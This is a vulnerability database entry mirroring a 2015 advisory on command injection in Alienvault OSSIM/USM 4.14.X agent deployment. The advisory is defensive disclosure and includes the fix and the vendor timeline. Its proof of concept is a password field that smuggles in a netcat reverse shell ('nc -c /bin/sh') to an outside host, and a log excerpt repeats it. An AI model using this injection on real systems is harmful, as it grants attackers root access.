Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alienvault OSSIM/USM 4.14.X Command Execution

🗓️ 16 Jan 2015 00:00:00Reported by Peter LappType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Alienvault OSSIM/USM 4.14.X Command Execution vulnerability. Allows unauthorized root access via OSSEC agent deployment on Windows hosts

Code
`Details  
=======  
  
Product: Alienvault OSSIM/USM  
Vulnerability: Command Execution  
Author: Peter Lapp, [email protected]  
CVE: None assigned  
Vulnerable Versions: <=4.14.X  
Fixed Version: 4.15.0  
  
  
Summary  
=======  
  
Alienvault OSSIM is an open source SIEM solution designed to collect  
and correlate log data. The automatic deployment option for OSSEC  
agents is vulnerable to command execution as root. Authentication to  
the web UI is required to exploit this vulnerability.  
  
  
  
Technical Details and POC  
=========================  
  
The web UI allows a user to automatically deploy OSSEC agents to  
Windows hosts when supplied with a username and password. The username  
and password are passed unfiltered to a command that runs as root. By  
simply providing a password of "fakepass | nc -c /bin/sh X.X.X.X 1234  
| " a reverse shell is created and root access to the operating system  
is obtained.  
  
The user.log shows the input as it is passed to the command:  
  
Dec 18 16:42:28 ossim-server ansible-command: Invoked with  
executable=/bin/bash shell=True args= program_files_x86=$(winexe  
--user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 |  
//10.10.10.199 'cmd /c set' | grep "^ProgramFiles(x86)=" | cut -d'='  
-f 2-); program_files_x64=$(winexe --user=/test%fakepass | nc -c  
/bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep  
"^ProgramFiles=" | cut -d'=' -f 2-); [[ $program_files_x86 ]] && echo  
$program_files_x86 || echo $program_files_x64 removes=None  
creates=None chdir=None  
  
  
  
Solution  
========  
  
Upgrade to v4.15  
  
  
  
References  
==========  
  
https://www.alienvault.com/forums/discussion/4414/alienvault-v4-15-functional-release  
(ENG-98338)  
  
  
  
Timeline  
========  
12/18/14 - Reported the vulnerability to the vendor and received  
confirmation that a defect was filed.  
01/14/15 - Vendor confirmed the issue was fixed and patch available.  
01/15/15 - Confirmed vulnerability was no longer exploitable and released info.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jan 2015 00:00Current
0.4Low risk
Vulners AI Score0.4
alienvault ossimusmcommand executionwindows hostsvulnerabilityroot accessossec agentweb uiupgradevendorpatch.
18